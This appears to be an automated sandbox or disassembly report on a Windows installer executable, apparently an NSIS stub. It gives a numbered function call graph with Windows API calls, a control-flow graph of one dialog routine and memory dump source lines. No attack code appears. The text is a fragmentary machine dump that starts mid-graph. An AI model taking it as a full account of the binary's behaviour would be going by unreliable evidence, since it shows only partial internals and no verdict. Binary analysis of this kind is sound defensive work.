3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3955 405d88 3951->3955 3954 405d83 CharNextW 3952->3954 3952->3955 3953 405dac 3953->3910 3954->3953 3955->3953 3956 405d06 CharNextW 3955->3956 3956->3955 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3965 403c91 3964->3965 3966 403876 3965->3966 3967 403c96 FreeLibrary GlobalFree 3965->3967 3968 406c9b 3966->3968 3967->3966 3967->3967 3969 40677e 18 API calls 3968->3969 3970 406cae 3969->3970 3971 406cb7 DeleteFileW 3970->3971 3972 406cce 3970->3972 4012 403882 CoUninitialize 3971->4012 3973 406e4b 3972->3973 4016 406009 lstrcpynW 3972->4016 3979 4062d5 2 API calls 3973->3979 4001 406e58 3973->4001 3973->4012 3975 406cf9 3976 406d03 lstrcatW 3975->3976 3977 406d0d 3975->3977 3978 406d13 3976->3978 3980 406751 2 API calls 3977->3980 3982 406d23 lstrcatW 3978->3982 3983 406d19 3978->3983 3981 406e64 3979->3981 3980->3978 3986 406722 3 API calls 3981->3986 3981->4012 3985 406d2b lstrlenW FindFirstFileW 3982->3985 3983->3982 3983->3985 3984 4062a3 11 API calls 3984->4012 3987 406e3b 3985->3987 3991 406d52 3985->3991 3988 406e6e 3986->3988 3987->3973 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3987 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3984 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3975 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3653 4022->3677 4023->3698 4024->3698 4025->3685 4027 406ae7 GetShortPathNameW 4026->4027 4028 406abe 4026->4028 4029 406b00 4027->4029 4030 406c62 4027->4030 4052 405e50 GetFileAttributesW CreateFileW 4028->4052 4029->4030 4032 406b08 WideCharToMultiByte 4029->4032 4030->3705 4032->4030 4034 406b25 WideCharToMultiByte 4032->4034 4033 406ac7 CloseHandle GetShortPathNameW 4033->4030 4035 406adf 4033->4035 4034->4030 4036 406b3d wsprintfA 4034->4036 4035->4027 4035->4030 4037 406805 18 API calls 4036->4037 4038 406b69 4037->4038 4053 405e50 GetFileAttributesW CreateFileW 4038->4053 4040 406b76 4040->4030 4041 406b83 GetFileSize GlobalAlloc 4040->4041 4042 406ba4 ReadFile 4041->4042 4043 406c58 CloseHandle 4041->4043 4042->4043 4044 406bbe 4042->4044 4043->4030 4044->4043 4054 405db6 lstrlenA 4044->4054 4047 406bd7 lstrcpyA 4050 406bf9 4047->4050 4048 406beb 4049 405db6 4 API calls 4048->4049 4049->4050 4051 406c30 SetFilePointer WriteFile GlobalFree 4050->4051 4051->4043 4052->4033 4053->4040 4055 405df7 lstrlenA 4054->4055 4056 405dd0 lstrcmpiA 4055->4056 4057 405dff 4055->4057 4056->4057 4058 405dee CharNextA 4056->4058 4057->4047 4057->4048 4058->4055 4939 402a84 4940 401553 19 API calls 4939->4940 4941 402a8e 4940->4941 4942 401446 18 API calls 4941->4942 4943 402a98 4942->4943 4944 401a13 4943->4944 4945 402ab2 RegEnumKeyW 4943->4945 4946 402abe RegEnumValueW 4943->4946 4947 402a7e 4945->4947 4946->4944 4946->4947 4947->4944 4948 4029e4 RegCloseKey 4947->4948 4948->4944 4949 402c8a 4950 402ca2 4949->4950 4951 402c8f 4949->4951 4953 40145c 18 API calls 4950->4953 4952 401446 18 API calls 4951->4952 4955 402c97 4952->4955 4954 402ca9 lstrlenW 4953->4954 4954->4955 4956 402ccb WriteFile 4955->4956 4957 401a13 4955->4957 4956->4957 4958 40400d 4959 40406a 4958->4959 4960 40401a lstrcpynA lstrlenA 4958->4960 4960->4959 4961 40404b 4960->4961 4961->4959 4962 404057 GlobalFree 4961->4962 4962->4959 4963 401d8e 4964 40145c 18 API calls 4963->4964 4965 401d95 ExpandEnvironmentStringsW 4964->4965 4966 401da8 4965->4966 4968 401db9 4965->4968 4967 401dad lstrcmpW 4966->4967 4966->4968 4967->4968 4969 401e0f 4970 401446 18 API calls 4969->4970 4971 401e17 4970->4971 4972 401446 18 API calls 4971->4972 4973 401e21 4972->4973 4974 4030e3 4973->4974 4976 405f51 wsprintfW 4973->4976 4976->4974 4977 402392 4978 40145c 18 API calls 4977->4978 4979 402399 4978->4979 4982 4071f8 4979->4982 4983 406ed2 25 API calls 4982->4983 4984 407218 4983->4984 4985 407222 lstrcpynW lstrcmpW 4984->4985 4986 4023a7 4984->4986 4987 407254 4985->4987 4988 40725a lstrcpynW 4985->4988 4987->4988 4988->4986 4059 402713 4074 406009 lstrcpynW 4059->4074 4061 40272c 4075 406009 lstrcpynW 4061->4075 4063 402738 4064 40145c 18 API calls 4063->4064 4066 402743 4063->4066 4064->4066 4065 402752 4068 40145c 18 API calls 4065->4068 4070 402761 4065->4070 4066->4065 4067 40145c 18 API calls 4066->4067 4067->4065 4068->4070 4069 40145c 18 API calls 4071 40276b 4069->4071 4070->4069 4072 4062a3 11 API calls 4071->4072 4073 40277f WritePrivateProfileStringW 4072->4073 4074->4061 4075->4063 4989 402797 4990 40145c 18 API calls 4989->4990 4991 4027ae 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027b7 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027c0 GetPrivateProfileStringW lstrcmpW 4994->4995 4996 402e18 4997 40145c 18 API calls 4996->4997 4998 402e1f FindFirstFileW 4997->4998 4999 402e32 4998->4999 5004 405f51 wsprintfW 4999->5004 5001 402e43 5005 406009 lstrcpynW 5001->5005 5003 402e50 5004->5001 5005->5003 5006 401e9a 5007 40145c 18 API calls 5006->5007 5008 401ea1 5007->5008 5009 401446 18 API calls 5008->5009 5010 401eab wsprintfW 5009->5010 4286 401a1f 4287 40145c 18 API calls 4286->4287 4288 401a26 4287->4288 4289 4062a3 11 API calls 4288->4289 4290 401a49 4289->4290 4291 401a64 4290->4291 4292 401a5c 4290->4292 4340 406009 lstrcpynW 4291->4340 4339 406009 lstrcpynW 4292->4339 4295 401a62 4299 406038 5 API calls 4295->4299 4296 401a6f 4297 406722 3 API calls 4296->4297 4298 401a75 lstrcatW 4297->4298 4298->4295 4301 401a81 4299->4301 4300 4062d5 2 API calls 4300->4301 4301->4300 4302 405e30 2 API calls 4301->4302 4304 401a98 CompareFileTime 4301->4304 4305 401ba9 4301->4305 4309 4062a3 11 API calls 4301->4309 4313 406009 lstrcpynW 4301->4313 4319 406805 18 API calls 4301->4319 4326 405ca0 MessageBoxIndirectW 4301->4326 4330 401b50 4301->4330 4337 401b5d 4301->4337 4338 405e50 GetFileAttributesW CreateFileW 4301->4338 4302->4301 4304->4301 4306 404f72 25 API calls 4305->4306 4308 401bb3 4306->4308 4307 404f72 25 API calls 4310 401b70 4307->4310 4311 40337f 37 API calls 4308->4311 4309->4301 4314 4062a3 11 API calls 4310->4314 4312 401bc6 4311->4312 4315 4062a3 11 API calls 4312->4315 4313->4301 4321 401b8b 4314->4321 4316 401bda 4315->4316 4317 401be9 SetFileTime 4316->4317 4318 401bf8 CloseHandle 4316->4318 4317->4318 4320 401c09 4318->4320 4318->4321 4319->4301 4322 401c21 4320->4322 4323 401c0e 4320->4323 4325 406805 18 API calls 4322->4325 4324 406805 18 API calls 4323->4324 4327 401c16 lstrcatW 4324->4327 4328 401c29 4325->4328 4326->4301 4327->4328 4329 4062a3 11 API calls 4328->4329 4331 401c34 4329->4331 4332 401b93 4330->4332 4333 401b53 4330->4333 4334 405ca0 MessageBoxIndirectW 4331->4334 4335 4062a3 11 API calls 4332->4335 4336 4062a3 11 API calls 4333->4336 4334->4321 4335->4321 4336->4337 4337->4307 4338->4301 4339->4295 4340->4296 5011 40209f GetDlgItem GetClientRect 5012 40145c 18 API calls 5011->5012 5013 4020cf LoadImageW SendMessageW 5012->5013 5014 4030e3 5013->5014 5015 4020ed DeleteObject 5013->5015 5015->5014 5016 402b9f 5017 401446 18 API calls 5016->5017 5022 402ba7 5017->5022 5018 402c4a 5019 402bdf ReadFile 5021 402c3d 5019->5021 5019->5022 5020 401446 18 API calls 5020->5021 5021->5018 5021->5020 5028 402d17 ReadFile 5021->5028 5022->5018 5022->5019 5022->5021 5023 402c06 MultiByteToWideChar 5022->5023 5024 402c3f 5022->5024 5026 402c4f 5022->5026 5023->5022 5023->5026 5029 405f51 wsprintfW 5024->5029 5026->5021 5027 402c6b SetFilePointer 5026->5027 5027->5021 5028->5021 5029->5018 5030 402b23 GlobalAlloc 5031 402b39 5030->5031 5032 402b4b 5030->5032 5033 401446 18 API calls 5031->5033 5034 40145c 18 API calls 5032->5034 5035 402b41 5033->5035 5036 402b52 WideCharToMultiByte lstrlenA 5034->5036 5037 402b93 5035->5037 5038 402b84 WriteFile 5035->5038 5036->5035 5038->5037 5039 402384 GlobalFree 5038->5039 5039->5037 5041 4044a5 5042 404512 5041->5042 5043 4044df 5041->5043 5045 40451f GetDlgItem GetAsyncKeyState 5042->5045 5052 4045b1 5042->5052 5109 405c84 GetDlgItemTextW 5043->5109 5048 40453e GetDlgItem 5045->5048 5055 40455c 5045->5055 5046 4044ea 5049 406038 5 API calls 5046->5049 5047 40469d 5107 404833 5047->5107 5111 405c84 GetDlgItemTextW 5047->5111 5050 403d3f 19 API calls 5048->5050 5051 4044f0 5049->5051 5054 404551 ShowWindow 5050->5054 5057 403e74 5 API calls 5051->5057 5052->5047 5058 406805 18 API calls 5052->5058 5052->5107 5054->5055 5060 404579 SetWindowTextW 5055->5060 5065 405d59 4 API calls 5055->5065 5056 403dca 8 API calls 5061 404847 5056->5061 5062 4044f5 GetDlgItem 5057->5062 5063 40462f SHBrowseForFolderW 5058->5063 5059 4046c9 5064 40677e 18 API calls 5059->5064 5066 403d3f 19 API calls 5060->5066 5067 404503 IsDlgButtonChecked 5062->5067 5062->5107 5063->5047 5068 404647 CoTaskMemFree 5063->5068 5069 4046cf 5064->5069 5070 40456f 5065->5070 5071 404597 5066->5071 5067->5042 5072 406722 3 API calls 5068->5072 5112 406009 lstrcpynW 5069->5112 5070->5060 5076 406722 3 API calls 5070->5076 5073 403d3f 19 API calls 5071->5073 5074 404654 5072->5074 5077 4045a2 5073->5077 5078 40468b SetDlgItemTextW 5074->5078 5083 406805 18 API calls 5074->5083 5076->5060 5110 403d98 SendMessageW 5077->5110 5078->5047 5079 4046e6 5081 4062fc 3 API calls 5079->5081 5090 4046ee 5081->5090 5082 4045aa 5086 4062fc 3 API calls 5082->5086 5084 404673 lstrcmpiW 5083->5084 5084->5078 5087 404684 lstrcatW 5084->5087 5085 404730 5113 406009 lstrcpynW 5085->5113 5086->5052 5087->5078 5089 404739 5091 405d59 4 API calls 5089->5091 5090->5085 5095 406751 2 API calls 5090->5095 5096 404785 5090->5096 5092 40473f GetDiskFreeSpaceW 5091->5092 5094 404763 MulDiv 5092->5094 5092->5096 5094->5096 5095->5090 5098 4047e2 5096->5098 5099 4043ad 21 API calls 5096->5099 5097 404805 5114 403d85 KiUserCallbackDispatcher 5097->5114 5098->5097 5100 40141d 80 API calls 5098->5100 5101 4047d3 5099->5101 5100->5097 5103 4047e4 SetDlgItemTextW 5101->5103 5104 4047d8 5101->5104 5103->5098 5105 4043ad 21 API calls 5104->5105 5105->5098 5106 404821 5106->5107 5115 403d61 5106->5115 5107->5056 5109->5046 5110->5082 5111->5059 5112->5079 5113->5089 5114->5106 5116 403d74 SendMessageW 5115->5116 5117 403d6f 5115->5117 5116->5107 5117->5116 5118 402da5 5119 4030e3 5118->5119 5120 402dac 5118->5120 5121 401446 18 API calls 5120->5121 5122 402db8 5121->5122 5123 402dbf SetFilePointer 5122->5123 5123->5119 5124 402dcf 5123->5124 5124->5119 5126 405f51 wsprintfW 5124->5126 5126->5119 5127 4030a9 SendMessageW 5128 4030c2 InvalidateRect 5127->5128 5129 4030e3 5127->5129 5128->5129 5130 401cb2 5131 40145c 18 API calls 5130->5131 5132 401c54 5131->5132 5133 4062a3 11 API calls 5132->5133 5136 401c64 5132->5136 5134 401c59 5133->5134 5135 406c9b 81 API calls 5134->5135 5135->5136 4086 4021b5 4087 40145c 18 API calls 4086->4087 4088 4021bb 4087->4088 4089 40145c 18 API calls 4088->4089 4090 4021c4 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021cd 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021d6 4093->4094 4095 404f72 25 API calls 4094->4095 4096 4021e2 ShellExecuteW 4095->4096 4097 40221b 4096->4097 4098 40220d 4096->4098 4100 4062a3 11 API calls 4097->4100 4099 4062a3 11 API calls 4098->4099 4099->4097 4101 402230 4100->4101 5144 402238 5145 40145c 18 API calls 5144->5145 5146 40223e 5145->5146 5147 4062a3 11 API calls 5146->5147 5148 40224b 5147->5148 5149 404f72 25 API calls 5148->5149 5150 402255 5149->5150 5151 405c3f 2 API calls 5150->5151 5152 40225b 5151->5152 5153 4062a3 11 API calls 5152->5153 5156 4022ac CloseHandle 5152->5156 5159 40226d 5153->5159 5155 4030e3 5156->5155 5157 402283 WaitForSingleObject 5158 402291 GetExitCodeProcess 5157->5158 5157->5159 5158->5156 5161 4022a3 5158->5161 5159->5156 5159->5157 5160 406332 2 API calls 5159->5160 5160->5157 5163 405f51 wsprintfW 5161->5163 5163->5156 5164 4040b8 5165 4040d3 5164->5165 5173 404201 5164->5173 5169 40410e 5165->5169 5195 403fca WideCharToMultiByte 5165->5195 5166 40426c 5167 404276 GetDlgItem 5166->5167 5168 40433e 5166->5168 5170 404290 5167->5170 5171 4042ff 5167->5171 5174 403dca 8 API calls 5168->5174 5176 403d3f 19 API calls 5169->5176 5170->5171 5179 4042b6 6 API calls 5170->5179 5171->5168 5180 404311 5171->5180 5173->5166 5173->5168 5175 40423b GetDlgItem SendMessageW 5173->5175 5178 404339 5174->5178 5200 403d85 KiUserCallbackDispatcher 5175->5200 5177 40414e 5176->5177 5182 403d3f 19 API calls 5177->5182 5179->5171 5183 404327 5180->5183 5184 404317 SendMessageW 5180->5184 5187 40415b CheckDlgButton 5182->5187 5183->5178 5188 40432d SendMessageW 5183->5188 5184->5183 5185 404267 5186 403d61 SendMessageW 5185->5186 5186->5166 5198 403d85 KiUserCallbackDispatcher 5187->5198 5188->5178 5190 404179 GetDlgItem 5199 403d98 SendMessageW 5190->5199 5192 40418f SendMessageW 5193 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5192->5193 5194 4041ac GetSysColor 5192->5194 5193->5178 5194->5193 5196 404007 5195->5196 5197 403fe9 GlobalAlloc WideCharToMultiByte 5195->5197 5196->5169 5197->5196 5198->5190 5199->5192 5200->5185 4195 401eb9 4196 401f24 4195->4196 4197 401ec6 4195->4197 4198 401f53 GlobalAlloc 4196->4198 4199 401f28 4196->4199 4200 401ed5 4197->4200 4207 401ef7 4197->4207 4201 406805 18 API calls 4198->4201 4206 4062a3 11 API calls 4199->4206 4211 401f36 4199->4211 4202 4062a3 11 API calls 4200->4202 4205 401f46 4201->4205 4203 401ee2 4202->4203 4208 402708 4203->4208 4213 406805 18 API calls 4203->4213 4205->4208 4209 402387 GlobalFree 4205->4209 4206->4211 4217 406009 lstrcpynW 4207->4217 4209->4208 4219 406009 lstrcpynW 4211->4219 4212 401f06 4218 406009 lstrcpynW 4212->4218 4213->4203 4215 401f15 4220 406009 lstrcpynW 4215->4220 4217->4212 4218->4215 4219->4205 4220->4208 5201 4074bb 5203 407344 5201->5203 5202 407c6d 5203->5202 5204 4073c2 GlobalFree 5203->5204 5205 4073cb GlobalAlloc 5203->5205 5206 407443 GlobalAlloc 5203->5206 5207 40743a GlobalFree 5203->5207 5204->5205 5205->5202 5205->5203 5206->5202 5206->5203 5207->5206

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                                                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
